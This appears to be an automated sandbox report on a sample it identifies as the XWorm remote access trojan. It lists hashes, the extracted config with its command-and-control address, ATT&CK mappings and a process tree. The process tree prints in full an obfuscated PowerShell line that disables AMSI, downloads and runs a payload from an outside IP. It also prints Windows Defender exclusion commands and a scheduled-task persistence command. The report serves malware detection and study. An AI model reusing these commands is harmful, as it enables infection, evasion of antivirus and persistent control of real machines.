xworm | aefbc83f1cf4facc11486398011bea48b4eae99ff13bebff0981ebc837cd1ecf

Analysis

max time kernel
150s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
08/03/2025, 19:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NukeCrypter/NukeCryptor.exe
Size

519KB
MD5

5897585e89a0e475202fd43bebb8b5ec
SHA1

d3b45d759ee686d142849560e7d9e55e604cd4f7
SHA256

fa3d58def6d373cfadebc1fa095731594c0c281a4d4119278d88087597fbaded
SHA512

eab6e541a3c427adbc2fef42f203be247e8617cb76a51e8705cf547941fd1590f383ad48bf8d9b21d3df2bf33bebe61e6d86ac010aa54bffb42edb237952ea63
SSDEEP

12288:KX9eknz7sMClkSWOx08pHSsiI7nTdYDJgsIrXtG4an2aHzI+Nan11aQIYP:KXYOClkg7SsiuTkJgl84XmI+0n1UHY

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

45.137.201.27:2010

Mutex

NJSnJLx9hqfSdYjB

Attributes

Install_directory
%LocalAppData%
install_file
msedge.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral6/files/0x001e00000002ad9f-29.dat	family_xworm
behavioral6/memory/3716-38-0x0000000000680000-0x00000000006AE000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3328	powershell.exe
2484	powershell.exe
3908	powershell.exe
2296	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
1	4956	Powermode.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe

Executes dropped EXE 4 IoCs

pid	Process
4956	Powermode.exe
3716	msedge.exe
5112	msedge.exe
1784	msedge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	NukeCryptor.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	NukeCryptor.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	NukeCryptor.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1960	schtasks.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
4956	Powermode.exe
4956	Powermode.exe
3328	powershell.exe
3328	powershell.exe
2484	powershell.exe
2484	powershell.exe
3908	powershell.exe
3908	powershell.exe
2296	powershell.exe
2296	powershell.exe
3716	msedge.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	4956	Powermode.exe
Token: SeDebugPrivilege	3716	msedge.exe
Token: SeDebugPrivilege	3328	powershell.exe
Token: SeDebugPrivilege	2484	powershell.exe
Token: SeDebugPrivilege	3908	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeDebugPrivilege	3716	msedge.exe
Token: SeDebugPrivilege	5112	msedge.exe
Token: SeDebugPrivilege	1784	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3716	msedge.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 3628 wrote to memory of 2384	3628	NukeCryptor.exe	82
PID 3628 wrote to memory of 2384	3628	NukeCryptor.exe	82
PID 2384 wrote to memory of 4956	2384	cmd.exe	84
PID 2384 wrote to memory of 4956	2384	cmd.exe	84
PID 4956 wrote to memory of 3716	4956	Powermode.exe	85
PID 4956 wrote to memory of 3716	4956	Powermode.exe	85
PID 3716 wrote to memory of 3328	3716	msedge.exe	86
PID 3716 wrote to memory of 3328	3716	msedge.exe	86
PID 3716 wrote to memory of 2484	3716	msedge.exe	88
PID 3716 wrote to memory of 2484	3716	msedge.exe	88
PID 3716 wrote to memory of 3908	3716	msedge.exe	90
PID 3716 wrote to memory of 3908	3716	msedge.exe	90
PID 3716 wrote to memory of 2296	3716	msedge.exe	92
PID 3716 wrote to memory of 2296	3716	msedge.exe	92
PID 3716 wrote to memory of 1960	3716	msedge.exe	94
PID 3716 wrote to memory of 1960	3716	msedge.exe	94

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\NukeCrypter\NukeCryptor.exe
"C:\Users\Admin\AppData\Local\Temp\NukeCrypter\NukeCryptor.exe"
1⤵
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\ProgramData\my_script.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2384
- - C:\ProgramData\Powermode.exe
    Powermode.exe -w hidden -ComMand $m1='A';$m3='i';$m2='ms';$m=$m1+$m2+$m3;$a1='am';$a2='si';$a=$a1+$a2+'InitFailed';$b1='No';$b2='nPu';$b3='bli';$b4='c,St';$b5='at';$b6='ic';$b=$b1+$b2+$b3+$b4+$b5+$b6;$ex=$null;$aaa1=[Ref].Assembly.GetType('System.Management.Automation.'+$m+'Utils').GetField($a,$b);$aaa1.SetValue($ex,$true);$XZLqW6au='http://45.137.201.27:30054/msedge.exe';$output=[System.IO.Path]::Combine($env:APPDATA,'msedge.exe');[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri $XZLqW6au -OutFile $output;Start-Process -FilePath $output;exit
    3⤵
    - Downloads MZ/PE file
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4956
  - - C:\Users\Admin\AppData\Roaming\msedge.exe
      "C:\Users\Admin\AppData\Roaming\msedge.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3716
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3328
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2484
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3908
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2296
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1960

C:\Users\Admin\AppData\Local\msedge.exe
C:\Users\Admin\AppData\Local\msedge.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5112

C:\Users\Admin\AppData\Local\msedge.exe
C:\Users\Admin\AppData\Local\msedge.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Powermode.exe

Filesize
440KB

MD5
0e9ccd796e251916133392539572a374

SHA1
eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

SHA256
c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

SHA512
e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

Download Submit
C:\ProgramData\my_script.bat

Filesize
729B

MD5
092cabe7fe4773b78ff62f414633572f

SHA1
c9f77f261d45e394086f7bb23eb91b80b8d0b318

SHA256
85d5ee43057001a08fa00e02a4aaf7d84a2d4407f662fa9c22b16b22a9d0738b

SHA512
e5d1b866e5a50243f953b67f191c4185aecdc828e5641cae6f78486f71f337f3efedbcb6051586b886a3c321db6fb17f9fe276cbc9954e0abb41e0813589a022

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b4bbeb446e9fd83e350822dada9dbb5e

SHA1
e05bf244c928a483af86845622836a4255621a60

SHA256
6cc9de80064adeb56e0ee65e69e5e85d4157d4b42a221244f81d1d75ec980df9

SHA512
58eb9e09fdc65cc0b3ea4593908edc36b6c6682a12bba07a1fc3a2fd22679e14fcc5d9944fe4567c1c3174d11d1bfce99b7d34dd22ac1064d4e212212e933c8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1cebd15e19078003226326aa50667159

SHA1
6d346e2ff9b8b6834a3e4b58240c41f5178e57f9

SHA256
ee661e2b1fa0a222a50eee925fae81512cc15faf5473a5740999e66f5eda4abe

SHA512
81ed3fd080d4e463514db6a6df8e54c24969ff8a2aea98f66153c12e0809b4e0429b2192f19afc1160ebe700c9774ce3e9e417ed3c2539e7bcbd996c94be75a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4093e5ab3812960039eba1a814c2ffb0

SHA1
b5e4a98a80be72fccd3cc910e93113d2febef298

SHA256
c0794e2b7036ce5612446a8b15e0c8387773bbc921f63cf8849f8a1f4ef3878c

SHA512
f3555b45aa1a1dd5214716dc81a05905c4ecd5a3e1276d35e08c65623ab1d14d469b3b576a5d9638264c1222d73889d2cc1ee43fb579d9ca3fcddd9f557cac7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
21017c68eaf9461301de459f4f07e888

SHA1
41ff30fc8446508d4c3407c79e798cf6eaa5bb73

SHA256
03b321e48ff3328d9c230308914961fe110c4c7bc96c0a85a296745437bcb888

SHA512
956990c11c6c1baa3665ef7ef23ef6073e0a7fcff77a93b5e605a83ff1e60b916d80d45dafb06977aed90868a273569a865cf2c623e295b5157bfff0fb2be35d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0m0npdbx.ubi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\msedge.exe

Filesize
165KB

MD5
22a01fdc6d06f445af5de9759799225f

SHA1
1dde5be9d7c8a7ae68332c92a6e1263f24705f7c

SHA256
682acd04365f06fd83daa81b7bbd71665a60e729d6d4ecc3693eb486b8d4a13f

SHA512
e602f9d32b78c8d317698337ea2eb02b6bbf72cae13d3a5c3e3cee39c2445a8c2d85514eb7c741125364fee2f83582ce6a41154128a6c88c257cb5e41eb8f2d6

Download Submit
memory/3628-50-0x00007FF93BCB0000-0x00007FF93C772000-memory.dmp

Filesize
10.8MB

Download
memory/3628-85-0x00007FF93BCB0000-0x00007FF93C772000-memory.dmp

Filesize
10.8MB

Download
memory/3628-1-0x0000000000980000-0x0000000000A06000-memory.dmp

Filesize
536KB

Download
memory/3628-90-0x00007FF93BCB0000-0x00007FF93C772000-memory.dmp

Filesize
10.8MB

Download
memory/3628-84-0x0000000067740000-0x000000006838B000-memory.dmp

Filesize
12.3MB

Download
memory/3628-2-0x000000001B9D0000-0x000000001BBE4000-memory.dmp

Filesize
2.1MB

Download
memory/3628-3-0x00007FF93BCB0000-0x00007FF93C772000-memory.dmp

Filesize
10.8MB

Download
memory/3628-49-0x00007FF93BCB3000-0x00007FF93BCB5000-memory.dmp

Filesize
8KB

Download
memory/3628-0-0x00007FF93BCB3000-0x00007FF93BCB5000-memory.dmp

Filesize
8KB

Download
memory/3628-5-0x00007FF93BCB0000-0x00007FF93C772000-memory.dmp

Filesize
10.8MB

Download
memory/3628-4-0x00007FF93BCB0000-0x00007FF93C772000-memory.dmp

Filesize
10.8MB

Download
memory/3716-38-0x0000000000680000-0x00000000006AE000-memory.dmp

Filesize
184KB

Download
memory/4956-13-0x000002984BB10000-0x000002984BB32000-memory.dmp

Filesize
136KB

Download
memory/4956-39-0x00007FF93BCB0000-0x00007FF93C772000-memory.dmp

Filesize
10.8MB

Download
memory/4956-23-0x00007FF93BCB0000-0x00007FF93C772000-memory.dmp

Filesize
10.8MB

Download
memory/4956-14-0x00007FF93BCB0000-0x00007FF93C772000-memory.dmp

Filesize
10.8MB

Download
memory/4956-24-0x00007FF93BCB0000-0x00007FF93C772000-memory.dmp

Filesize
10.8MB

Download